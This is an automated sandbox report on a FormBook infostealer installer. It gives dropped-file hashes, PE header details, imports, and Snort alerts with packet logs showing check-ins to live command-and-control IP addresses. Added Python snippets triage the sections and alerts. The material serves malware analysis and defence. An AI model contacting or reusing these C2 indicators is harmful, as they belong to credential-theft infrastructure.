                                                                        Preview: =n.....3@.1..*o..%..(..D.../.x.9....u..{..;.enPL!..#..0.6z.d.{j.......,k..Q.hP#.N.`*.F.76.l.....NZ.D....Mj.....c.e.4...j}A.8.G.GY..Z........M.(C........JF.Q..B.S.....F...m.fcF&HK........,.L,~...... ..Er....y`...0. .(`..s.C.'.9.@.Mg..d....v.EN$.R.W...x.6.\U..?m.V....oIf....U9T.6...>.E..x...+<C@mSf....s.v.......5..G.$o..1..]...(....zg.S.X9.\..ZnbsX@D.N..(I..r.....N...T......i....A...[_],.e....u.D...z~...?\..r.......1....}.....$..C.a.#~.n...#`..E~....fw]"..b..q....1.6 5.:N.~.'9.G o........./K=...._+.U..8...4.}...] ...C@.Bv....k9.h'.`E...zkI..:...r.d5.l.....iH8.P..H..2$"..k].^u.x.1........uX...^.....,/.}BHT...73..... ..My.BV^tV.^ $..r.l.:<+<..k...^.6./. .u......2....<..f`nz.6g^.Z......t..Ox.(.iBV`4.+.B.01..)...?..D..>.....~..'.dm....C..S..<...x<...P......`..&5<...>...u.}4.AQ~.._.V.3t5.......x...\._oF....2..............O-.(..H.TQo.....=...w7R.C...{...j7.Fm..[..<..}...3.."..~...]..*.x..9.........M<.......S:.b....'.e/K....q.m<..l.m..At._.
                                                                        C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll
                                                                        Process:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5120
                                                                        Entropy (8bit):4.171187189386588
                                                                        Encrypted:false
                                                                        SSDEEP:48:StGht7Wr3QTZj0a6PTh7SKFt5ET9TbOGa4zzBvoAXAdUMQ9Bg6RuqS:jSrATZX6BD5EhTiGXHBgVueax
                                                                        MD5:7023C422B5D2571D6B132378437B1E9E
                                                                        SHA1:1F2C41B1E36DDA6ED420B5F8708AF6457F59A10D
                                                                        SHA-256:2BF1F784B019210A10EEF61E5AF8ABFBB9E02748CF9D6718F4BF6B3F72661779
                                                                        SHA-512:2659574EDE5079F0B522C01E0FD7FCDD4DED74D895650126979980221BA77582C01DEFA76DDDDA42BC73E4C5CC8268D4285DA29D6C438212503B6ED1529C596D
                                                                        Malicious:false
                                                                        Joe Sandbox View:
                                                                        • Filename: Quotation Zhejiang.xlsx, Detection: malicious
                                                                        Reputation:low
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L....m`...........!......................... ...............................`............@......................... !..P...\".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\qmnajxcs95hz
                                                                        Process:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6661
                                                                        Entropy (8bit):7.96450606123374
                                                                        Encrypted:false
                                                                        SSDEEP:192:mKamyP2+KBf3IfmRxQpCkEAEYfu6tOy7UUwv9:m91i9YsxnkBuN2Q
                                                                        MD5:56D7E12AB211686BE29BD8E00F4A46DA
                                                                        SHA1:AD4A22657ADE632D181D7C523F3203E76695B546
                                                                        SHA-256:0F8A856FF0A1A63EA5BBF83BF33C4B61B4444512A53FB43A8811705042DB3A39
                                                                        SHA-512:08C01CD9B8F8E5BC5AEA8E031DBA01DEABC85499AAFC3E9228B524C7A5AD2668280B4EBA535A79BAE4F57FF21D460998C0D6D13ADDF24F8D96926C382E8B6960
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: ....&...:..W..i.....!...'K.Sx..:A8!<...;....4.....%.|...........v\...`Y~..NQ.v7..qQ# y..E\......s2...|...;..~.w%....|=...k....;{bL.._XQ9x..*H....4Mm..Ze..K....e.....1h....../n... ...h.R{l..`o.@....C.....W~A..CD~.d..*.67.R....[w..I'.....i...<A..Z..yr...?:/.S/...h....-..:AU.2.U.;..al....W70.bgu.?X......[..u.kRM..OH.i(...zX(+?..D]y....z;...}......a..".....>....."!..@.k\..P_.0q..R3O..*..'NQ..ST.5t....t..L...a.....2.o.{_5KJZm....(..$.{.....h[...Z.:'.W~....!..+..[..k....m..*.z..........X+.Ob;k..(.W?>..Y..GF.v..6.&.....M.(jsU..X.u.y....ih.O..4t...M1.:.tu6IB..!S\.!Mt.<xy:...w6...8.E....|...5....a./..x..i.|=r....@..........l.....-.......2..L..KT.............(..".,m.S..*#..#.`o.@.....V...cP..O.d.Uq.a...v.......PY.Aur.^...M\...y3.:.d.3....7^..~..8....S..I..=6}......5f..4a..6..O......=.....ur.~.;.'Vp.....4...p3.#n4.$et...=c..?...<.V~..Ga~...1|=.. t.@.....Z.gt.4........ Z.+.4u...&...K....^).8.Mh...D..V$...m.2]*....,.....m....Y..ND..~..H....../.#.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.915089020780882
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:eQLPRPErea.exe
                                                                        File size:206065
                                                                        MD5:2c64897aa30694cc768f5ea375157932
                                                                        SHA1:c897f37780a5237d5c330bcf2668745201b38ff5
                                                                        SHA256:18d465a5867ee069480bb9be8eb259be41cc008e487b7b6a3cad14e3559963a9
                                                                        SHA512:6c1cfc20e4aaf0ee78b60a80c5ff559cb71ac31b62f2e9068638046cd3fec5fe078f37de85c50c65090b82d784931e07bdf692a597b14133eae36ad143b3fea2
                                                                        SSDEEP:3072:NeYBCwqDxkJ0KBUc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlP4:NDIKUc2SXli2LbG87uroXR585UcNKbbQ
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\.........

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x403166
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x4538CD1D [Fri Oct 20 13:20:29 2006 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 0000017Ch
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        xor esi, esi
                                                                        push edi
                                                                        mov dword ptr [esp+18h], esi
                                                                        mov ebp, 00409240h
                                                                        mov byte ptr [esp+10h], 00000020h
                                                                        call dword ptr [00407030h]
                                                                        push esi
                                                                        call dword ptr [00407270h]
                                                                        mov dword ptr [0042F4D0h], eax
                                                                        push esi
                                                                        lea eax, dword ptr [esp+30h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push esi
                                                                        push 00429860h
                                                                        call dword ptr [00407158h]
                                                                        push 00409230h
                                                                        push 0042EC20h
                                                                        call 00007FC0E8845788h
                                                                        mov ebx, 00436400h
                                                                        push ebx
                                                                        push 00000400h
                                                                        call dword ptr [004070B4h]
                                                                        call 00007FC0E8842EC9h
                                                                        test eax, eax
                                                                        jne 00007FC0E8842F86h
                                                                        push 000003FBh
                                                                        push ebx
                                                                        call dword ptr [004070B0h]
                                                                        push 00409228h
                                                                        push ebx
                                                                        call 00007FC0E8845773h
                                                                        call 00007FC0E8842EA9h
                                                                        test eax, eax
                                                                        je 00007FC0E88430A2h
                                                                        mov edi, 00435000h
                                                                        push edi
                                                                        call dword ptr [00407140h]
                                                                        call dword ptr [004070ACh]
                                                                        push eax
                                                                        push edi
                                                                        call 00007FC0E8845731h
                                                                        push 00000000h
                                                                        call dword ptr [00407108h]
                                                                        cmp byte ptr [00435000h], 00000022h
                                                                        mov dword ptr [0042F420h], eax
                                                                        mov eax, edi
                                                                        jne 00007FC0E8842F6Ch
                                                                        mov byte ptr [esp+10h], 00000022h
                                                                        mov eax, 00000001h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                        Data Directories

                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7450 | 0xb4 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x567 | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

                                                                        Sections

                                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        .text | 0x1000 | 0x5bfe | 0x5c00 | False | 0.677097486413 | data | 6.48704517882 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rdata | 0x7000 | 0x11fe | 0x1200 | False | 0.465494791667 | data | 5.27785481266 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data | 0x9000 | 0x264d4 | 0x400 | False | 0.6669921875 | data | 5.22478733059 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc | 0x38000 | 0x567 | 0x600 | False | 0.432942708333 | data | 3.95240646825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        Name | RVA | Size | Type | Language | Country
                                                                        RT_DIALOG | 0x38100 | 0x100 | data | English | United States
                                                                        RT_DIALOG | 0x38200 | 0x11c | data | English | United States
                                                                        RT_DIALOG | 0x3831c | 0x60 | data | English | United States
                                                                        RT_MANIFEST | 0x3837c | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                        Imports

                                                                        DLL | Import
                                                                        KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                        USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                        GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                        SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                        ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                        COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                        ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
                                                                        VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
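The static fields in the General, Sections and Imports tables above are all derived from a handful of header values. The following Python, an added example that is not part of the Joe Sandbox report, recomputes the kind of values shown there: the compile time from IMAGE_FILE_HEADER.TimeDateStamp, section flag names from the characteristics DWORD, Shannon entropy, the pefile-style import hash, and a simple triage pass over the Sections table. The raw characteristics values and the triage thresholds are assumptions (the report prints flag names, not the DWORD); the imphash routine follows pefile's algorithm, and whether it reproduces the Import Hash reported above depends on the import listing preserving import-table order, so compare rather than assume.

```python
"""Recompute static PE fields of the kind shown in the report: compile
timestamp, section characteristics, entropy, pefile-style import hash and a
section triage. Added example, not part of the sandbox report. The SECTIONS
rows are constructed from the Sections table with raw flag DWORDs assumed."""
import hashlib
import math
from datetime import datetime, timezone

# IMAGE_SCN_* bits from winnt.h, the subset that appears in the Sections table.
SECTION_FLAGS = [
    (0x00000020, "IMAGE_SCN_CNT_CODE"),
    (0x00000040, "IMAGE_SCN_CNT_INITIALIZED_DATA"),
    (0x00000080, "IMAGE_SCN_CNT_UNINITIALIZED_DATA"),
    (0x20000000, "IMAGE_SCN_MEM_EXECUTE"),
    (0x40000000, "IMAGE_SCN_MEM_READ"),
    (0x80000000, "IMAGE_SCN_MEM_WRITE"),
]


def decode_timestamp(time_date_stamp):
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since 1970-01-01 UTC. For an
    NSIS installer it dates the prebuilt stub, not the day the payload was
    wrapped, so treat it as weak evidence."""
    dt = datetime.fromtimestamp(time_date_stamp, tz=timezone.utc)
    return dt.strftime("%Y-%m-%d %H:%M:%S UTC")


def decode_characteristics(value):
    """Flag names set in a section's Characteristics DWORD."""
    return [name for bit, name in SECTION_FLAGS if value & bit]


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes.
    Compressed or encrypted payloads sit near 8, plain x86 code around 6."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def imphash(imports):
    """pefile's import hash: MD5 over 'lib.func' pairs in import-table order,
    library lower-cased with .dll/.ocx/.sys removed, function lower-cased.
    imports = [("KERNEL32.dll", ["CloseHandle", ...]), ...]"""
    parts = []
    for lib, funcs in imports:
        lib = lib.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        parts.extend("%s.%s" % (lib, f.lower()) for f in funcs)
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def section_findings(name, virtual_size, raw_size, characteristics, entropy):
    """Triage rules an analyst applies to a Sections table. Thresholds are
    assumptions chosen for illustration, not values from the report."""
    flags = decode_characteristics(characteristics)
    findings = []
    if "IMAGE_SCN_MEM_EXECUTE" in flags and "IMAGE_SCN_MEM_WRITE" in flags:
        findings.append("writable and executable")
    if entropy > 7.0:
        findings.append("high entropy (packed or encrypted)")
    # A BSS-style section with raw size 0 (.ndata here) is normal; a section
    # whose virtual size dwarfs its file footprint is populated at run time.
    if raw_size and virtual_size > 4 * raw_size:
        findings.append("virtual size far exceeds raw size")
    return findings


# Rows of the Sections table above: (name, virtual size, raw size,
# characteristics DWORD assumed from the listed flag names, entropy).
SECTIONS = [
    (".text",  0x5bfe,  0x5c00, 0x60000020, 6.48704517882),
    (".rdata", 0x11fe,  0x1200, 0x40000040, 5.27785481266),
    (".data",  0x264d4, 0x400,  0xC0000040, 5.22478733059),
    (".ndata", 0x8000,  0x0,    0xC0000080, 0.0),
    (".rsrc",  0x567,   0x600,  0x40000040, 3.95240646825),
]


def triage_sections(sections=SECTIONS):
    """Map section name to its findings, omitting clean sections."""
    return {row[0]: section_findings(*row) for row in sections if section_findings(*row)}


if __name__ == "__main__":
    print("compiled:", decode_timestamp(0x4538CD1D))
    for name, findings in triage_sections().items():
        print(name, "->", "; ".join(findings))
```

Run as a script it prints the 2006 stub build date and flags only .data, whose 0x264d4 virtual size against a 0x400 raw size is where the NSIS stub keeps state it fills at run time; the 7.9 file-level entropy comes from the compressed archive appended after the sections, not from any section listed.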

                                                                        Possible Origin

                                                                        Language of compilation system | Country where language is spoken
                                                                        English | United States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                        04/08/21-10:48:49.778557 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.4 | 184.168.131.241
                                                                        04/08/21-10:48:49.778557 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.4 | 184.168.131.241
                                                                        04/08/21-10:48:49.778557 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.4 | 184.168.131.241
                                                                        04/08/21-10:48:55.129556 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.4 | 13.248.216.40
                                                                        04/08/21-10:48:55.129556 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.4 | 13.248.216.40
                                                                        04/08/21-10:48:55.129556 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.4 | 13.248.216.40
                                                                        04/08/21-10:48:55.307358 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49737 | 13.248.216.40 | 192.168.2.4
                                                                        04/08/21-10:49:16.320554 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49755 | 34.102.136.180 | 192.168.2.4
                                                                        04/08/21-10:49:21.406011 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        04/08/21-10:49:21.406011 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        04/08/21-10:49:21.406011 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49758 | 80 | 192.168.2.4 | 64.190.62.111
                                                                        04/08/21-10:49:32.039463 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49765 | 80 | 192.168.2.4 | 91.195.240.94
                                                                        04/08/21-10:49:32.039463 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49765 | 80 | 192.168.2.4 | 91.195.240.94
                                                                        04/08/21-10:49:32.039463 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49765 | 80 | 192.168.2.4 | 91.195.240.94
                                                                        04/08/21-10:49:43.196349 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.4 | 34.102.136.180
                                                                        04/08/21-10:49:43.196349 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.4 | 34.102.136.180
                                                                        04/08/21-10:49:43.196349 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.4 | 34.102.136.180
                                                                        04/08/21-10:49:43.311575 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49768 | 34.102.136.180 | 192.168.2.4
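The alert table above and the TCP Packets table below together answer the questions a responder asks first: which hosts received a check-in, which of those answered 403 Forbidden on the same connection, and which hosts the sample talked to without any rule firing. The following Python, an added example that is not part of the Joe Sandbox report, does that correlation. ALERTS is the Snort table transcribed into pipe-delimited rows (the duplicate 2031449/2031412 rows are kept for the first connection only, to show how they collapse) and CONNECTIONS is the first client SYN of each connection visible in the TCP Packets table; both are constructed here from the page.

```python
"""Correlate FormBook check-in alerts with 403 responses and with the list
of servers actually contacted. Added example, not part of the sandbox
report; ALERTS and CONNECTIONS are transcribed from the report's tables."""
from collections import defaultdict

VICTIM = "192.168.2.4"
CHECKIN_SIDS = {2031412, 2031449, 2031453}   # ET TROJAN FormBook CnC Checkin (GET)
FORBIDDEN_SID = 1201                          # ATTACK-RESPONSES 403 Forbidden

# Snort table, pipe-delimited. Three ET rules fire on every check-in GET;
# the duplicates are shown for the first connection only.
ALERTS = """\
04/08/21-10:48:49.778557 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.4 | 184.168.131.241
04/08/21-10:48:49.778557 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.4 | 184.168.131.241
04/08/21-10:48:49.778557 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.4 | 184.168.131.241
04/08/21-10:48:55.129556 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.4 | 13.248.216.40
04/08/21-10:48:55.307358 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49737 | 13.248.216.40 | 192.168.2.4
04/08/21-10:49:16.320554 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49755 | 34.102.136.180 | 192.168.2.4
04/08/21-10:49:21.406011 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49758 | 80 | 192.168.2.4 | 64.190.62.111
04/08/21-10:49:32.039463 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49765 | 80 | 192.168.2.4 | 91.195.240.94
04/08/21-10:49:43.196349 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.4 | 34.102.136.180
04/08/21-10:49:43.311575 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49768 | 34.102.136.180 | 192.168.2.4
"""

# First client SYN of each connection in the TCP Packets table: (client port, server).
CONNECTIONS = [
    (49734, "184.168.131.241"), (49737, "13.248.216.40"), (49742, "135.181.58.27"),
    (49743, "64.32.22.102"), (49755, "34.102.136.180"), (49758, "64.190.62.111"),
    (49759, "185.230.60.177"),
]


def parse_alerts(text):
    """One dict per alert row, with SID and ports as integers."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proto, sid, msg, sport, dport, src, dst = (f.strip() for f in line.split("|"))
        rows.append({"ts": ts, "proto": proto, "sid": int(sid), "msg": msg,
                     "sport": int(sport), "dport": int(dport), "src": src, "dst": dst})
    return rows


def summarise(alerts, victim=VICTIM):
    """Per remote host: client ports that carried a check-in and client ports
    that received a 403. Keying on the client port collapses the three ET
    rules that fire on one GET into a single connection."""
    hosts = defaultdict(lambda: {"checkin_ports": set(), "forbidden_ports": set()})
    for a in alerts:
        if a["sid"] in CHECKIN_SIDS and a["src"] == victim:
            hosts[a["dst"]]["checkin_ports"].add(a["sport"])
        elif a["sid"] == FORBIDDEN_SID and a["dst"] == victim:
            hosts[a["src"]]["forbidden_ports"].add(a["dport"])
    return dict(hosts)


def classify(summary):
    """Label each host from the alert evidence alone."""
    labels = {}
    for host, s in summary.items():
        if s["checkin_ports"] & s["forbidden_ports"]:
            labels[host] = "check-in answered 403"
        elif s["checkin_ports"]:
            labels[host] = "check-in, no 403 seen"
        else:
            labels[host] = "403 only, GET did not match a check-in rule"
    return labels


def uncovered_hosts(connections, summary):
    """Servers the sample connected to for which Snort raised nothing; their
    HTTP transcripts need a manual look rather than being dropped from scope."""
    return sorted({ip for _, ip in connections if ip not in summary})


if __name__ == "__main__":
    summary = summarise(parse_alerts(ALERTS))
    for host, label in sorted(classify(summary).items()):
        print("%-16s %s" % (host, label))
    print("no alerts:", ", ".join(uncovered_hosts(CONNECTIONS, summary)))
```

Two details the per-row view hides fall out immediately: 34.102.136.180 was contacted twice, and only the second GET (port 49768) matched a check-in rule although both were refused with 403; and three of the servers in the packet list (135.181.58.27, 64.32.22.102, 185.230.60.177) produced no alert at all, so any blocklist built from the Snort output alone would be incomplete.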

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Apr 8, 2021 10:48:49.599870920 CEST | 49734 | 80 | 192.168.2.4 | 184.168.131.241
                                                                        Apr 8, 2021 10:48:49.778085947 CEST | 80 | 49734 | 184.168.131.241 | 192.168.2.4
                                                                        Apr 8, 2021 10:48:49.778321981 CEST | 49734 | 80 | 192.168.2.4 | 184.168.131.241
                                                                        Apr 8, 2021 10:48:49.778557062 CEST | 49734 | 80 | 192.168.2.4 | 184.168.131.241
                                                                        Apr 8, 2021 10:48:49.956588984 CEST | 80 | 49734 | 184.168.131.241 | 192.168.2.4
                                                                        Apr 8, 2021 10:48:49.956664085 CEST | 80 | 49734 | 184.168.131.241 | 192.168.2.4
                                                                        Apr 8, 2021 10:48:49.956691980 CEST | 80 | 49734 | 184.168.131.241 | 192.168.2.4
                                                                        Apr 8, 2021 10:48:49.957007885 CEST | 49734 | 80 | 192.168.2.4 | 184.168.131.241
                                                                        Apr 8, 2021 10:48:49.957043886 CEST | 49734 | 80 | 192.168.2.4 | 184.168.131.241
                                                                        Apr 8, 2021 10:48:50.135140896 CEST | 80 | 49734 | 184.168.131.241 | 192.168.2.4
                                                                        Apr 8, 2021 10:48:55.114048958 CEST | 49737 | 80 | 192.168.2.4 | 13.248.216.40
                                                                        Apr 8, 2021 10:48:55.126236916 CEST | 80 | 49737 | 13.248.216.40 | 192.168.2.4
                                                                        Apr 8, 2021 10:48:55.129455090 CEST | 49737 | 80 | 192.168.2.4 | 13.248.216.40
                                                                        Apr 8, 2021 10:48:55.129555941 CEST | 49737 | 80 | 192.168.2.4 | 13.248.216.40
                                                                        Apr 8, 2021 10:48:55.141519070 CEST | 80 | 49737 | 13.248.216.40 | 192.168.2.4
                                                                        Apr 8, 2021 10:48:55.307358027 CEST | 80 | 49737 | 13.248.216.40 | 192.168.2.4
                                                                        Apr 8, 2021 10:48:55.307454109 CEST | 80 | 49737 | 13.248.216.40 | 192.168.2.4
                                                                        Apr 8, 2021 10:48:55.307897091 CEST | 49737 | 80 | 192.168.2.4 | 13.248.216.40
                                                                        Apr 8, 2021 10:48:55.319649935 CEST | 80 | 49737 | 13.248.216.40 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:05.623529911 CEST | 49742 | 80 | 192.168.2.4 | 135.181.58.27
                                                                        Apr 8, 2021 10:49:05.674776077 CEST | 80 | 49742 | 135.181.58.27 | 192.168.2.4
                                                                        Apr 8, 2021 10:49:05.674967051 CEST | 49742 | 80 | 192.168.2.4 | 135.181.58.27
                                                                        Apr 8, 2021 10:49:05.675004959 CEST | 49742 | 80 | 192.168.2.4 | 135.181.58.27
                                                                        Apr 8, 2021 10:49:05.732067108 CEST | 80 | 49742 | 135.181.58.27 | 192.168.2.4
